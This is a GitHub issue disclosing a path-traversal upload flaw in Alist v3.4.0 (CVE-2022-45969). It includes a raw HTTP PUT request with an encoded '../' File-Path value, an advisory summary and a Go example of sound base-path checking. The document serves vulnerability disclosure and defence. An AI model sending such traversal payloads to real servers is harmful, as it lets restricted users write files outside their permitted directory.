CVE-2022-45969: Directory traversal file upload vulnerability · Issue #2449 · alist-org/alist

Alist v3.4.0 is vulnerable to Directory Traversal,

Please make sure of the following things

  • I have read the documentation.
  • I’m sure there are no duplicate issues or discussions.
  • I’m sure it’s due to alist and not something else (such as Dependencies or Operational).
  • I’m sure I’m using the latest version

Alist Version

v3.4.0 (It seems like this problem still exists in version 3.5.1)

Driver used

Local

Describe the bug

  • A user with only file upload permission can bypass the base path restriction by using ‘… /’ to bypass the base path restriction and upload files to an arbitrary path

  • I created a user ‘test’ with file upload permission only and set its base path to ‘/test’

  • My file directory structure is as follows

  • Log in as ‘test’ and find that I am already in ‘/test’

  • Then try to upload a file, capture the package and modify the ‘File-Path’ parameter with ‘…/’

  • Send the package, and log in as ‘admin’ to check ‘/testPasswd’. You will find that the file has been uploaded successfully.

Reproduction

Package:
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
Content-Length: 30530
Accept: application/json, text/plain, */*
As-Task: false
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyOTQ4NTMsIm5iZiI6MTY2OTEyMjA1MywiaWF0IjoxNjY5MTIyMDUzfQ.DwnVRyCGUZ0Cx2B7s6kCqvrg_-rzQ7hf5tbbsy4RSVc
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
File-Path: …%2ftestPasswd%2ftestDirectoryTraversal
Content-Type: application/octet-stream
Origin: http://192.168.31.148:52000
Referer: http://192.168.31.148:52000/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

�PNG

Logs

Related news

GHSA-pmg2-rph8-p8r6: Alist vulnerable to Path Traversal

In versions of Alist prior to 3.6.0, a user with only file upload permission can bypass the base path restriction by using '... /' to bypass the base path restriction and upload files to an arbitrary path.
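
The base-path check that this issue and advisory turn on, as an added Go example (not Alist's own code): it joins a user's base path with a URL-encoded File-Path value and shows why containment has to be tested on a path-segment boundary, since with the issue's names the escaped target /testPasswd still starts with the string /test. The function names are hypothetical, and the sample header is constructed, assuming ".." where the capture above shows "…".

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path"
	"strings"
)

var ErrOutsideBase = errors.New("path escapes the user's base path")

// resolve decodes the File-Path header value and joins it onto the base path.
// path.Join collapses "..", so the result alone may sit outside base.
func resolve(base, header string) (string, error) {
	rel, err := url.PathUnescape(header)
	if err != nil {
		return "", fmt.Errorf("bad File-Path encoding: %w", err)
	}
	return path.Join("/", base, rel), nil
}

// weakContains is the tempting but flawed check: a bare string prefix
// treats the sibling "/testPasswd" as if it were inside "/test".
func weakContains(base, full string) bool {
	return strings.HasPrefix(full, path.Clean("/"+base))
}

// safeResolve accepts the path only if it is base itself or below "base/".
func safeResolve(base, header string) (string, error) {
	full, err := resolve(base, header)
	if err != nil {
		return "", err
	}
	root := path.Clean("/" + base)
	if full != root && !strings.HasPrefix(full, strings.TrimSuffix(root, "/")+"/") {
		return "", ErrOutsideBase
	}
	return full, nil
}

func main() {
	// Constructed input; ".." is assumed where the page's capture shows "…".
	hdr := "..%2ftestPasswd%2ftestDirectoryTraversal"
	full, _ := resolve("/test", hdr)
	fmt.Println("joined:", full, "weak check passes:", weakContains("/test", full))
	_, err := safeResolve("/test", hdr)
	fmt.Println("safeResolve:", err)
}
```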
